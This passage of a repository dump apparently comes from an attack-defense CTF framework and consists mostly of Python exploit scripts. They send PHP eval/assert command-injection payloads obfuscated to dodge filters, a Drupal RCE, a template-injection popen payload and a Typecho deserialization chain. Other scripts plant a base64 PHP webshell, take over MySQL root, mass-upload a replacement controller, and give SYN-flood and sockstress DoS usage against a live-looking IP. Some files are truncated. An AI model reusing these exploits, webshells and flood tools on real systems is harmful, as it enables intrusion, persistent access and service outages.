--connect-timeout 2 '%(ip,port)) 14 | r = os.popen('curl %s:%s/logout'%(ip,port)) 15 | print r.read() 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /samples/not_use/db_admin_attack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | 4 | from http import http 5 | from config import * 6 | from function import * 7 | from urllib import quote 8 | 9 | def db_admin_attack(target,cmd,cookie): 10 | header = {"Cookie":cookie} 11 | res = "error" 12 | print cmd 13 | cmd = quote(cmd) 14 | try: 15 | res = http("get",target,target_port,"/ez_web/admin/db_admin.php?db=admin&action=listRows&collection=zzz&find=array(1);system('"+ cmd +"');exit;","",header) 16 | #print res 17 | except Exception,e: 18 | dump_error(target,"something error happens","db_admin_attack.py db_admin_attack") 19 | return res 20 | #print db_admin_attack("127.0.0.1","ls","PHPSESSID=vavafb01qsskmhu41dnk08d1r1;") 21 | #print db_admin_attack("127.0.0.1","/bin/echo PD9waHAgaWYoJF9SRVFVRVNUW2hhc2hdPT0iOGUwM2RmZTY0YmNmYzE5OTMyOTgxNzk3NjQxOGFiYWUiKXskY18xID0gYmFzZTY0X2RlY29kZShzdHJfcm90MTMoJF9SRVFVRVNUW2FdKSk7JGNfMiA9IGJhc2U2NF9kZWNvZGUoc3RyX3JvdDEzKCRfUkVRVUVTVFtiXSkpOyRjXzEoJGNfMik7fT8+ | /usr/bin/base64 -d | /bin/cat > /var/www/html/ez_web//.5ba106f5e0946576c7bdd26672bb8ee1.php","PHPSESSID=vavafb01qsskmhu41dnk08d1r1;") 22 | -------------------------------------------------------------------------------- /samples/not_use/file_write.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | 4 | from http import http 5 | from config import * 6 | from function import * 7 | from urllib import quote 8 | import time 9 | 10 | def file_write(target,filename,contents,cookie): 11 | header = {"Cookie":cookie} 12 | res = "error" 13 | print "waiting to writes shell..." 14 | i = 0 15 | for content in contents: 16 | data = "require('fs').appendFile('" + filename + "','" + content + "');1" 17 | if i==0: 18 | data = "require('fs').writeFile('" + filename + "','" + content + "');1" 19 | try: 20 | res = http("get",target,target_port,"/ez_web/admin/count.php?cheat=" + quote(data),"",header) 21 | i += 1 22 | except Exception,e: 23 | dump_error(target,"something error happens","db_admin_attack.py db_admin_attack") 24 | return False 25 | return True 26 | from login import login 27 | file_write("192.168.2.114","5",'exports.a=function(c){return require("child_process").exec(c);}',login("192.168.2.114")) 28 | -------------------------------------------------------------------------------- /samples/not_use/js_attack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | 4 | from http import http 5 | from config import * 6 | from function import * 7 | from urllib import quote 8 | 9 | # u may need to change this one 10 | js_filename = ".2" 11 | 12 | def js_attack(target,cmd,cookie): 13 | header = {"Cookie":cookie} 14 | res = "error" 15 | #print cmd 16 | cmd = quote(cmd) 17 | #write js file 18 | from file_write import file_write 19 | from js_exe import js_exe 20 | file_write(target,"2",'exports.a=function(c){return require("child_process").exec(c);}',cookie) 21 | 22 | #write tmp php file 23 | shell_name,shell,encode_shell = generate_shell(target,"") 24 | file_write(target,"3",shell,cookie) 25 | 26 | #write sh file 27 | shell_content = "mv 3 " + shell_absolute_path + "/" +shell_name 28 | file_write(target,"4",shell_content,cookie) 29 | 30 | #execute sh file 31 | js_exe(target,"2",cookie) 32 | 33 | res = execute_shell(target,cmd) 34 | 35 | return res 36 | -------------------------------------------------------------------------------- /samples/not_use/js_exe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | 4 | from http import http 5 | from config import * 6 | from function import * 7 | from urllib import quote 8 | 9 | 10 | def js_exe(target,filename,cookie): 11 | header = {"Cookie":cookie} 12 | res = "error" 13 | data = "require('./" + filename + "').a('sh ./4');1" 14 | try: 15 | res = http("get",target,target_port,"/ez_web/admin/count.php?cheat=" + quote(data),"",header) 16 | except Exception,e: 17 | dump_error(target,e,"js_exe.py js_exe") 18 | return False 19 | return res 20 | 21 | #js_exe("127.0.0.1","2","PHPSESSID=5hurakabmkompu4ks1a1g6ab75") 22 | 23 | -------------------------------------------------------------------------------- /samples/not_use/login.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | 3 | import os 4 | 5 | hosts = open('data/ip.data').readlines() 6 | for host in hosts: 7 | host = host.strip() 8 | ip,port = host.split(':') 9 | print ip 10 | r = os.popen('curl %s:%s/api/upload/ -F "type=image" -F "savepath=/gotsctf2018/controllers" -F "image=@login_controller.go" --connect-timeout 2 '%(ip,port)) 11 | r = os.popen('curl %s:%s/logout'%(ip,port)) 12 | print r.read() 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /samples/not_use/tmp.php: -------------------------------------------------------------------------------- 1 | _version = $version; 12 | $this->_type = $type; 13 | $this->_charset = $charset; 14 | $this->_lang = $lang; 15 | } 16 | public function addItem(array $item) 17 | { 18 | $this->_items[] = $item; 19 | } 20 | } 21 | class Typecho_Request 22 | { 23 | private $_params = array('screenName'=>'fputs(fopen(\'./usr/uploads/.a.php\',\'w\'),\'\')'); 24 | private $_filter = array('assert'); 25 | //private $_filter = array('assert', array('Typecho_Response', 'redirect')); 26 | } 27 | $payload1 = new Typecho_Feed(5, 'ATOM 1.0'); 28 | $payload2 = new Typecho_Request(); 29 | $payload1->addItem(array('author' => $payload2)); 30 | $exp['adapter'] = $payload1; 31 | $exp['prefix'] = 'Rai4over'; 32 | echo base64_encode(serialize($exp)); 33 | -------------------------------------------------------------------------------- /samples/old/ali_assert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | #cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | #payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | payload = cmd 25 | data = 'form_id=user_register_form&mail[0][#lazy_builder][0]=system&mail[#type]=markup&mail[0][#lazy_builder][1][0]=%s'% quote(payload) 26 | res = http("post",target,target_port,"/user/register?element_parents=account/mail/%23value&ajax_form=1",data,headers) 27 | except Exception,e: 28 | debug_print(traceback.format_exc()) 29 | dump_error("attack failed",target,"vulnerable attack") 30 | res = "error" 31 | 32 | return res 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /samples/old/bctf_exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | 10 | 11 | def vulnerable_attack(target,target_port,cmd): 12 | 13 | ''' 14 | this is the payload script for vuln: 15 | 16 | eval($_POST[333]); 17 | assert($_POST[333]); 18 | ''' 19 | try: 20 | payload = "/{{().__class__.__bases__.0.__subclasses__().59.__init__.__globals__.linecache.os.popen(\"" + cmd + "\").read()}}" 21 | res = http("get",target,target_port,payload,"",headers) 22 | before = "

URL " 23 | after = " not found


" 24 | s = res[res.find(before)+len(before):res.find(after)] 25 | res = s 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | -------------------------------------------------------------------------------- /samples/old/bctf_read.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | try: 18 | payload = "/link?url=file:///flag" 19 | res = http("get",target,target_port,payload,"",headers) 20 | res = cmd_prefix + str(res)+ cmd_postfix 21 | except Exception,e: 22 | debug_print(traceback.format_exc()) 23 | dump_error("attack failed",target,"vulnerable attack") 24 | res = "error" 25 | 26 | return res 27 | 28 | 29 | -------------------------------------------------------------------------------- /samples/old/hctf_edit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | import urllib 7 | import traceback 8 | from replay import * 9 | 10 | def vulnerable_attack(target,target_port,cmd): 11 | 12 | ''' 13 | this is the payload script for vuln: 14 | 15 | replay with some traffic 16 | 17 | ''' 18 | 19 | try: 20 | print "cmd => " + cmd 21 | cmd = urllib.quote(cmd) 22 | res = sequence_attack(target,target_port,cmd,'edit_page',3) 23 | except Exception,e: 24 | debug_print(traceback.format_exc()) 25 | dump_error("attack failed",target,"vulnerable attack") 26 | res = "error" 27 | 28 | return res 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /samples/old/hctf_image.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | import urllib 7 | import traceback 8 | from replay import * 9 | 10 | def vulnerable_attack(target,target_port,cmd): 11 | 12 | ''' 13 | this is the payload script for vuln: 14 | 15 | replay with some traffic 16 | 17 | ''' 18 | 19 | try: 20 | print "cmd => " + cmd 21 | cmd = urllib.quote(cmd) 22 | res = sequence_attack(target,target_port,cmd,'image_upload',3) 23 | except Exception,e: 24 | debug_print(traceback.format_exc()) 25 | dump_error("attack failed",target,"vulnerable attack") 26 | res = "error" 27 | 28 | return res 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /samples/old/hctf_inc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | import urllib 7 | import traceback 8 | from replay import * 9 | 10 | def vulnerable_attack(target,target_port,cmd): 11 | 12 | ''' 13 | this is the payload script for vuln: 14 | 15 | replay with some traffic 16 | 17 | ''' 18 | 19 | try: 20 | print "cmd => " + cmd 21 | cmd = urllib.quote(cmd) 22 | res = sequence_attack(target,target_port,cmd,'inc',2) 23 | except Exception,e: 24 | debug_print(traceback.format_exc()) 25 | dump_error("attack failed",target,"vulnerable attack") 26 | res = "error" 27 | 28 | return res 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /samples/old/hwb_eval.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | #cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | res = http("get",target,target_port,"/index.php/index/index/?back1=system&back2=%s"%quote(cmd),"",headers) 24 | except Exception,e: 25 | debug_print(traceback.format_exc()) 26 | dump_error("attack failed",target,"vulnerable attack") 27 | res = "error" 28 | 29 | return res 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /samples/old/mysql.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | import urllib 7 | import traceback 8 | from replay import * 9 | 10 | def vulnerable_attack(target,target_port,cmd): 11 | 12 | ''' 13 | this is the payload script for vuln: 14 | 15 | replay with some traffic 16 | 17 | ''' 18 | 19 | try: 20 | print "cmd => " + cmd 21 | cmd = urllib.quote(cmd) 22 | res = sequence_attack(target,target_port,cmd,'sql',3) 23 | except Exception,e: 24 | debug_print(traceback.format_exc()) 25 | dump_error("attack failed",target,"vulnerable attack") 26 | res = "error" 27 | 28 | return res 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /samples/old/php_assert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'shell=%s'% quote(payload) 25 | res = http("post",target,target_port,"/.shell.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /samples/old/php_input_include.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | import urllib 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | include "php://input"; 15 | 16 | ''' 17 | 18 | try: 19 | cmd = urllib.unquote(cmd) 20 | cmd = base64.b64encode(cmd) 21 | data = ""%cmd 22 | res = http("post",target,target_port,"/index.php?f=a",data,headers) 23 | except Exception,e: 24 | debug_print(traceback.format_exc()) 25 | dump_error("attack failed",target,"vulnerable attack") 26 | res = "error" 27 | 28 | return res 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /samples/old/php_system.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | #cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | data = 'haozigege=%s'% quote(cmd) 24 | res = http("post",target,target_port,"/charpter2-1.0-SNAPSHOT/1.jsp",data,headers) 25 | except Exception,e: 26 | debug_print(traceback.format_exc()) 27 | dump_error("attack failed",target,"vulnerable attack") 28 | res = "error" 29 | 30 | return res 31 | 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /samples/old/qwb_block_2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | import hashlib 9 | import time 10 | 11 | 12 | def vulnerable_attack(target,target_port,cmd): 13 | 14 | 15 | try: 16 | # This payload may not work under some php versions 17 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 18 | #print payload 19 | res = block(target,target_port,cmd) 20 | res = cmd_prefix + res + cmd_postfix 21 | except Exception,e: 22 | debug_print(traceback.format_exc()) 23 | dump_error("attack failed",target,"vulnerable attack") 24 | res = "error" 25 | 26 | return res 27 | 28 | 29 | 30 | def block(target,target_port,cmd): 31 | s = requests.Session() 32 | ip = target 33 | url_11 = "http://%s:%s/app.php/classroom/1" % (ip,str(target_port)) 34 | data = ");UPDATE mysql.user SET User='aaaaaaaaaaaa' WHERE user='root';FLUSH PRIVILEGES;#/manage" 35 | url_11 = url_11 + quote(data) 36 | print s.get(url_11).content 37 | 38 | 39 | url_final = 'http://%s:%s/app.php/admin/course_set/1/delete' % (ip,str(target_port)) 40 | res = s.get(url_final).content 41 | return res 42 | -------------------------------------------------------------------------------- /samples/old/sample.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[222]); 15 | 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | payload = "$a='sy'.'stem';$b = '%s';$a(base64_decode($b));"%cmd 21 | data = '222=%s'% quote(payload) 22 | res = http("post",target,target_port,"/index.php",data,headers) 23 | except Exception,e: 24 | debug_print(traceback.format_exc()) 25 | dump_error("attack failed",target,"vulnerable attack") 26 | res = "error" 27 | 28 | return res 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /samples/old/sequence_attack_eval.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | import urllib 7 | import traceback 8 | from replay import * 9 | 10 | def vulnerable_attack(target,target_port,cmd): 11 | 12 | ''' 13 | this is the payload script for vuln: 14 | 15 | replay with some traffic 16 | 17 | ''' 18 | 19 | try: 20 | print "cmd => " + cmd 21 | cmd = base64.b64encode(cmd) 22 | cmd = urllib.quote(cmd) 23 | res = sequence_attack(target,target_port,cmd,'php_eval',1) 24 | except Exception,e: 25 | debug_print(traceback.format_exc()) 26 | dump_error("attack failed",target,"vulnerable attack") 27 | res = "error" 28 | 29 | return res 30 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /samples/old/shit_assert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'cmd=%s'% (payload) 25 | headers['Cookie'] = data 26 | headers['X-Forwarded-For'] = '8.8.8.8' 27 | res = http("post",target,target_port,"/index.php/admin/login/backdoor?hongkexueyuan=assert",data,headers) 28 | except Exception,e: 29 | debug_print(traceback.format_exc()) 30 | dump_error("attack failed",target,"vulnerable attack") 31 | res = "error" 32 | 33 | return res 34 | 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /samples/old/shit_assert_2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = '222=%s'% quote(payload) 25 | res = http("post",target,target_port,"/1.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /samples/old/shit_assert_3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | data = 'cmd=%s'% (flag_path) 24 | headers['Cookie'] = data 25 | headers['X-Forwarded-For'] = '8.8.8.8' 26 | res = http("post",target,target_port,"/index.php/admin/login/backdoor?hongkexueyuan=highlight_file",data,headers) 27 | except Exception,e: 28 | debug_print(traceback.format_exc()) 29 | dump_error("attack failed",target,"vulnerable attack") 30 | res = "error" 31 | 32 | if len(res) ==32: 33 | res = cmd_prefix + res + cmd_postfix 34 | else: 35 | res = 'error' 36 | return res 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /samples/old/wdb_assert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'a=%s'% quote(payload) 25 | res = http("post",target,target_port,"/tmp/99.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /samples/old/wdb_assert_2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'value=%s'% quote(payload) 25 | res = http("post",target,target_port,"/data/user/1.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /samples/old/wdb_read4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import requests,re 4 | from framework.http import http 5 | from framework.config import * 6 | from framework.function import * 7 | from urllib import quote 8 | import traceback 9 | from random import randint 10 | 11 | def vulnerable_attack(target,target_port,cmd): 12 | 13 | ''' 14 | this is the payload script for vuln: 15 | 16 | echo file_get_contents($_POST[444]); 17 | 18 | ''' 19 | 20 | try: 21 | cmd = flag_path 22 | data = quote(cmd) 23 | #res = http("get",target,target_port,"/bigbrother?filename="+data,'',headers) 24 | print 'haozigege' 25 | res = attack(target,target_port,cmd) 26 | # Even though we can not execute the cmd with the vuln, but we can read flag 27 | # and we want to use our framework to carry out this attack 28 | # not do the replicate tasks to code a new script 29 | res = cmd_prefix + res + cmd_postfix 30 | except Exception,e: 31 | debug_print(traceback.format_exc()) 32 | dump_error("attack failed",target,"vulnerable attack") 33 | res = "error" 34 | 35 | return res 36 | 37 | def attack(ip,port,cmd): 38 | my_socket = ip + ':' + str(port) 39 | flag_regex_pattern = "[0-9a-fA-F\-]{36}" 40 | rep = requests.get("http://%s/"%my_socket).content 41 | if 42 | 43 | 44 | 45 | 46 | print rep.content 47 | return rep.content 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /samples/old/yun_assert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'haozigege=%s'% quote(payload) 25 | res = http("post",target,target_port,"/index.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /samples/old/yunan_assert_1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from framework.http import http 4 | from framework.config import * 5 | from framework.function import * 6 | from urllib import quote 7 | import traceback 8 | 9 | def vulnerable_attack(target,target_port,cmd): 10 | 11 | ''' 12 | this is the payload script for vuln: 13 | 14 | eval($_POST[333]); 15 | assert($_POST[333]); 16 | ''' 17 | 18 | try: 19 | cmd = base64.b64encode(cmd) 20 | # This payload may not work under some php versions 21 | #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd 22 | #print payload 23 | payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd 24 | data = 'c=%s'% quote(payload) 25 | res = http("post",target,target_port,"/a.php",data,headers) 26 | except Exception,e: 27 | debug_print(traceback.format_exc()) 28 | dump_error("attack failed",target,"vulnerable attack") 29 | res = "error" 30 | 31 | return res 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /script/.1.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /script/1.php: -------------------------------------------------------------------------------- 1 | aaaa bbbb -------------------------------------------------------------------------------- /script/README.md: -------------------------------------------------------------------------------- 1 | ####synflood 2 | 3 | ddos/yssyn/synflood 4 | 5 | Usage: 6 | ./synflood 7 | Example: 8 | ./synflood 112.74.12.29 8999 10000000 0 1000000000 20 9 | 10 | ####tcp connect 11 | 12 | ddos/sockstress 13 | 14 | Usage: 15 | ./sockstress : [-p payload] [-d delay] 16 | Example: 17 | ./sockstress 112.74.12.29:8999 eth0 18 | -------------------------------------------------------------------------------- /script/docker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | docker run -v `pwd`:/var/www/html -p 83:8888 -ti web_14.04 /var/www/html/run.sh 3 | -------------------------------------------------------------------------------- /script/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | service apache2 start 3 | service mysql start 4 | /bin/bash -------------------------------------------------------------------------------- /script/sockstress: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/script/sockstress -------------------------------------------------------------------------------- /script/synflood: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/script/synflood -------------------------------------------------------------------------------- /script/test.php: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /script/test.sh: -------------------------------------------------------------------------------- 1 | #! /bin/bash 2 | function read_dir(){ 3 | for file in `ls $1` #注意此处这是两个反引号,表示运行系统命令 4 | do 5 | if [ -d $1"/"$file ] #注意此处之间一定要加上空格,否则会报错 6 | then 7 | read_dir $1"/"$file 8 | else 9 | echo $1"/"$file #在此处处理文件即可 10 | fi 11 | done 12 | } 13 | read_dir $1 | grep .php | xargs sed -i '$a\' 14 | -------------------------------------------------------------------------------- /script/test2.sh: -------------------------------------------------------------------------------- 1 | function read_dir(){ for file in `ls $1`;do if [ -d $1"/"$file ];then read_dir $1"/"$file;else echo $1"/"$file;fi;done };read_dir $1 | grep .php | xargs sed -i '$a\' 2 | -------------------------------------------------------------------------------- /seq/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhl2008/ctf-framework/fb0a0c2af8a22f9d0506b678e61d6088902b7011/seq/__init__.py -------------------------------------------------------------------------------- /seq/attack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from new_replay import * 4 | import requests 5 | import hashlib 6 | import time 7 | 8 | target = '47.105.121.116' 9 | target_port = 8801 10 | my_hash = hashlib.md5('xxxx' + str(target) + str(target_port) + str(time.time())).hexdigest() 11 | file_dir = 'seq/read_flag_qwb/' 12 | s = requests.session() 13 | 14 | request_1 = open(file_dir + '1.txt').read() 15 | reply_1 = send_http(s,parse_http(request_1),target,target_port) 16 | # print reply_1[1] 17 | 18 | request_2 = open(file_dir + '2.txt').read() 19 | request_2 = request_2.replace('{{cookie}}','') 20 | request_2 = request_2.replace('{{token}}','') 21 | print parse_http(request_2) 22 | exit() 23 | reply_2 = send_http(s,parse_http(request_2),target,target_port) 24 | print reply_2[1] 25 | 26 | request_3 = open(file_dir + '3.txt').read() 27 | request_3 = request_3.replace('{{cookie}}','') 28 | reply_3 = send_http(s,parse_http(request_3),target,target_port) 29 | print reply_3[1] 30 | 31 | -------------------------------------------------------------------------------- /seq/change_passeword/1.txt: 